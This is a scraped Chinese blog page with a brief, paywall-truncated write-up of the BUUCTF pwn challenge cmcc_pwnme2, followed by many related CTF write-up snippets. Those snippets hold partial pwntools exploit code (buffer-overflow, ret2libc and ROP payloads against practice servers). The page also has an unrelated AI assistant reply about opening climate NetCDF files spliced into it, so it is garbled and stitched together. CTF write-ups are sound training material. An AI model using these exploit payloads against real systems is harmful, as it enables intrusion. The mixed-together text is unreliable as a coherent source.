BUUCTF之“cmcc_pwnme2”做题简单记录

最新推荐文章于 2024-01-31 14:40:58 发布
原创 最新推荐文章于 2024-01-31 14:40:58 发布 · 2.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文介绍了一篇关于使用IDA分析函数名获取提示,并通过构造payload利用缓冲区溢出漏洞执行特定指令获取shell的过程。文章中提到了payload制作的细节,特别是注意sendline函数的使用方式,避免了程序错误。

这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就
是提示的信息。

from pwn import *

p = remote('node4.buuoj.cn',25488)
elf=ELF('./pwnme2')

exec_string=0x080485cb
string=0x0804a060
gets=elf.sym[
最低0.47元/天 解锁文章
[BUUCTF]PWN——cmcc_pwnme2
mcmuyanga的博客
01-20 1215
cmcc_pwnme2 附件 步骤: 例行检查,32位,开启了nx保护 本地运行一下看看大概的情况 32位ida载入 main(),10行的gets存在溢出 userfunction() main函数里就这么多东西,看看左边的函数列表,发现了挺有意思的几个函数 exec_string() add_home() add_flag() 由于exec_string()函数的存在,所以想到的是利用它来读取出flag,add_home()和add_flag()应该是这题比赛时候的目录,根据之前在buu
buuctf[cmcc_pwnme1]题解
weixin_46521144的博客
03-26 409
拿到题目,发现getflag函数和简单栈溢出 高兴的尝试了一波,然而发现home目录下没有flag,倒是也正常,没有简单到这种程度 看一下保护 没有开,那也很简单,直接利用栈溢出,ret2libc即可 使用LibcSearcher直接搜索,这题就当是熟练手感了 from pwn import * from LibcSearcher import LibcSearcher context.log_level='debug' # io=process('./pwnme1') io=rem
cmcc_pwnme2
z1r0的博客
12-29 778
cmcc_pwnme2 查看保护 直接用的ret2libc。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27722) else: r = process(file_name) elf = ELF(file_name) def dbg():
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
cmcc pwnme2
pondzhang的专栏
12-25 390
from pwn import * #p = process('./pwnme2') p = remote("node3.buuoj.cn",26522) libc = ELF('./libc-2.23.so') plt_puts = 0x08048490 got_puts = 0x0804A028 main = 0x080486F8 payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts).
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 861
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
[BUUCTF-pwn]——cmcc_pwnme1
Y_peak的博客
03-09 583
[BUUCTF-pwn]——cmcc_pwnme1 题目地址:https://buuoj.cn/challenges#cmcc_pwnme1 先checksec一下,什么保护都没有开,嘶 在IDA中 看完之后,相信大家和我一样.就这??? 思路很清晰, 选择5,进入getfruit,利用栈溢出.修改返回地址为 getflag 结果, 没有这个文件, 搞笑呀 不过可以栈溢出, 我们可以利用ret2libc来解决 思路 通过栈溢出,循环调用. 第一次利用栈溢出leek出地址, 找到libc计算偏移找
[BUUCTF]-PWN:cmcc_pwnme2解析
2301_79326813的博客
01-31 364
保护ida。
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 564
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 678
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 690
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
pwnme2pwnme3的wp
一个码农的笔记
10-15 1557
这两个题目是cmcc的比赛,比较有意思,我把pwn的wp发出来,供大家学习,我会写的稍微详细一点,方便新手学习 pwnme2的下载地址是http://download.youkuaiyun.com/download/niexinming/10021147 题目要求:Task: 溢出,操控按顺序执行函数,读取到flag文件即可... 题目地址:nc 104.224.169.128 18887把pwnme2直接
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 764
buuctf pwn 第三页
buuctf-pwn write-ups (10)
CoLin的pwn小屋
03-04 810
buuctf wp
BUUCTFpwn】解题记录(1-3页已完结)
Assassin
05-05 2290
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
buuctf DSACTF7月pwn 栈迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got
carol2358的博客
07-27 1756
文章目录actf_2019_babystack actf_2019_babystack 栈迁移,注意ret对齐 没对齐的: 对齐的: exp: from pwn import * from LibcSearcher import * local_file = './ACTF_2019_babystack' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-o
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 792
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
PWN-PRACTICE-BUUCTF-19
P1umH0的博客
09-07 202
PWN-PRACTICE-BUUCTF-19hitcontraining_bambooboxpicoctf_2018_shellcodenpuctf_2020_easyheapcmcc_pwnme2 hitcontraining_bamboobox unlink,参考:hitcontraining_bamboobox 堆技巧 unlink # -*- coding:utf-8 -*- from pwn import * #io=process("./bamboobox") io=remote("node4.
C:\Users\25792\PycharmProjects\PythonProject\.venv\Scripts\python.exe C:\Users\25792\AppData\Roaming\JetBrains\PyCharm2025.2\scratches\scratch.py ✅ 目录存在,包含以下文件: 📄 CMCC_ESM2_SSP245_hurs_2015.nc (100 MB) 📄 CMCC_ESM2_SSP245_hurs_2016.nc (95 MB) 📄 CMCC_ESM2_SSP245_hurs_2017.nc (93 MB) 📄 CMCC_ESM2_SSP245_hurs_2018.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2019.nc (102 MB) 📄 CMCC_ESM2_SSP245_hurs_2020.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2021.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2022.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2023.nc (103 MB) 📄 CMCC_ESM2_SSP245_hurs_2024.nc (90 MB) 📄 CMCC_ESM2_SSP245_hurs_2025.nc (106 MB) 📄 CMCC_ESM2_SSP245_hurs_2026.nc (101 MB) 📄 CMCC_ESM2_SSP245_hurs_2027.nc (104 MB) 📄 CMCC_ESM2_SSP245_hurs_2028.nc (106 MB) 📄 CMCC_ESM2_SSP245_hurs_2029.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2030.nc (107 MB) 📄 CMCC_ESM2_SSP245_hurs_2031.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2032.nc (105 MB) 📄 CMCC_ESM2_SSP245_hurs_2033.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2034.nc (96 MB) 📄 CMCC_ESM2_SSP245_hurs_2035.nc (102 MB) 📄 CMCC_ESM2_SSP245_hurs_2036.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2037.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2038.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2039.nc (100 MB) 📄 CMCC_ESM2_SSP245_hurs_2040.nc (96 MB) 📄 CMCC_ESM2_SSP245_hurs_2041.nc (87 MB) 📄 CMCC_ESM2_SSP245_hurs_2042.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2043.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2044.nc (88 MB) 📄 CMCC_ESM2_SSP245_hurs_2045.nc (102 MB) 📄 CMCC_ESM2_SSP245_hurs_2046.nc (89 MB) 📄 CMCC_ESM2_SSP245_hurs_2047.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2048.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2049.nc (95 MB) 📄 CMCC_ESM2_SSP245_hurs_2050.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2051.nc (108 MB) 📄 CMCC_ESM2_SSP245_hurs_2052.nc (93 MB) 📄 CMCC_ESM2_SSP245_hurs_2053.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2054.nc (104 MB) 📄 CMCC_ESM2_SSP245_hurs_2055.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2056.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2057.nc (93 MB) 📄 CMCC_ESM2_SSP245_hurs_2058.nc (92 MB) 📄 CMCC_ESM2_SSP245_hurs_2059.nc (105 MB) 📄 CMCC_ESM2_SSP245_hurs_2060.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2061.nc (91 MB) 📄 CMCC_ESM2_SSP245_hurs_2062.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2063.nc (96 MB) 📄 CMCC_ESM2_SSP245_hurs_2064.nc (90 MB) 📄 CMCC_ESM2_SSP245_hurs_2065.nc (95 MB) 📄 CMCC_ESM2_SSP245_hurs_2066.nc (103 MB) 📄 CMCC_ESM2_SSP245_hurs_2067.nc (102 MB) 📄 CMCC_ESM2_SSP245_hurs_2068.nc (100 MB) 📄 CMCC_ESM2_SSP245_hurs_2069.nc (96 MB) 📄 CMCC_ESM2_SSP245_hurs_2070.nc (89 MB) 📄 CMCC_ESM2_SSP245_hurs_2071.nc (101 MB) 📄 CMCC_ESM2_SSP245_hurs_2072.nc (100 MB) 📄 CMCC_ESM2_SSP245_hurs_2073.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2074.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2075.nc (108 MB) 📄 CMCC_ESM2_SSP245_hurs_2076.nc (91 MB) 📄 CMCC_ESM2_SSP245_hurs_2077.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2078.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2079.nc (93 MB) 📄 CMCC_ESM2_SSP245_hurs_2080.nc (92 MB) 📄 CMCC_ESM2_SSP245_hurs_2081.nc (104 MB) 📄 CMCC_ESM2_SSP245_hurs_2082.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2083.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2084.nc (107 MB) 📄 CMCC_ESM2_SSP245_hurs_2085.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2086.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2087.nc (100 MB) 📄 CMCC_ESM2_SSP245_hurs_2088.nc (105 MB) 📄 CMCC_ESM2_SSP245_hurs_2089.nc (97 MB) 1.7.2 进程已结束,退出代码为 0
最新发布
09-22
太好了!你已经成功执行了目录扫描,并确认: ✅ `CMCC_ESM2_SSP245_hurs_2025.nc` 确实存在于该路径下! 并且你还打印出了 `netCDF4.__version__` 是 `1.7.2`,说明库也安装正确。 --- ## 🎉 那么问题来了:为什么之前会报错? 你的原始错误是: ```python FileNotFoundError: [Errno 2] No such file or directory: 'D:\\10KM中国全域数据\\CMCC_ESM2_SSP245_hurs\\CMCC_ESM2_SSP245_hurs_2025.nc' ``` 但现在我们确认: - ✅ 文件存在 - ✅ 路径拼写一致 👉 **这说明最可能的原因是:Python 脚本运行时的工作目录或路径编码出现了细微偏差。** 但既然文件真实存在,我们可以直接测试打开它。 --- ## ✅ 第六步:现在立刻验证能否读取 `.nc` 文件 请运行以下完整测试脚本: ```python import xarray as xr import os # 正确的文件路径(复制粘贴自你列出的内容) file_path = r"D:\10KM中国全域数据\CMCC_ESM2_SSP245_hurs\CMCC_ESM2_SSP245_hurs_2025.nc" # 再次检查文件是否存在 if not os.path.exists(file_path): print(f"❌ 文件不存在!请检查:\n {file_path}") else: print(f"✅ 文件已找到,大小为 {os.path.getsize(file_path) // (1024*1024)} MB") try: # 显式使用 netCDF4 引擎打开 with xr.open_dataset(file_path, engine='netcdf4') as ds: print("\n🎉 成功打开 NetCDF 文件!") print("\n📌 文件基本信息:") print(ds.info()) # 类似 summary 的信息 # 打印变量名,确认是否有 'hurs' print("\n📊 变量列表:", list(ds.variables.keys())) # 打印经纬度和时间范围 if 'lat' in ds: print(f"📍 纬度范围: {ds['lat'].min().item():.2f} ~ {ds['lat'].max().item():.2f}°N") if 'lon' in ds: print(f"🌍 经度范围: {ds['lon'].min().item():.2f} ~ {ds['lon'].max().item():.2f}°E") if 'time' in ds: times = ds['time'] print(f"📅 时间范围: {times[0].values} 到 {times[-1].values}") except OSError as e: print(f"❌ NetCDF 文件损坏或格式不支持:{e}") except Exception as e: print(f"❌ 其他异常:{type(e).__name__}: {e}") ``` --- ### 🔍 预期输出示例(理想情况): ``` ✅ 文件已找到,大小为 106 MB 🎉 成功打开 NetCDF 文件! 📌 文件基本信息: <xarray.Dataset> Dimensions: (lat: 360, lon: 720, time: 365) Variables: ... ... 📊 变量列表: ['time', 'lat', 'lon', 'hurs'] 📍 纬度范围: 15.00 ~ 55.00°N 🌍 经度范围: 70.00 ~ 140.00°E 📅 时间范围: 2025-01-01 到 2025-12-31 ``` --- ## ⚠️ 如果仍然失败?常见原因如下: | 错误类型 | 解决方法 | |--------|---------| | `OSError: Invalid netCDF file` | 文件下载不完整或损坏,重新获取 | | `PermissionError` | 文件被其他程序占用(如 Panoply、MATLAB),关闭后再试 | | `ModuleNotFoundError: netCDF4` | 虽然你装了,但可能是虚拟环境错乱,重装:<br>`pip install --force-reinstall netCDF4` | --- ## ✅ 成功之后下一步建议 一旦你能读取这个文件,就可以进行后续操作,比如: ### 示例:提取某一点(如 35.23°N, 107.67°E)的湿度时间序列 ```python with xr.open_dataset(file_path, engine='netcdf4') as ds: hurs_point = ds['hurs'].interp(lat=35.23, lon=107.67, method='linear') df = hurs_point.to_dataframe()['hurs'] df.to_csv("hurs_35.23N_107.67E_2025.csv") print("✅ 插值完成并导出 CSV") ``` --- ## ✅ 总结:你现在要做的事 1. ✅ 运行上面的“完整测试脚本” 2. ✅ 观察是否能成功打开并显示变量、时空范围 3. ✅ 如果成功 → 开始提取数据 4. ✅ 如果失败 → 贴出新的错误日志,我帮你分析具体原因(很可能是文件损坏) --- 只要你运行完这个脚本,基本就能确定是“环境问题”还是“数据问题”。 期待你回复结果 👇 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值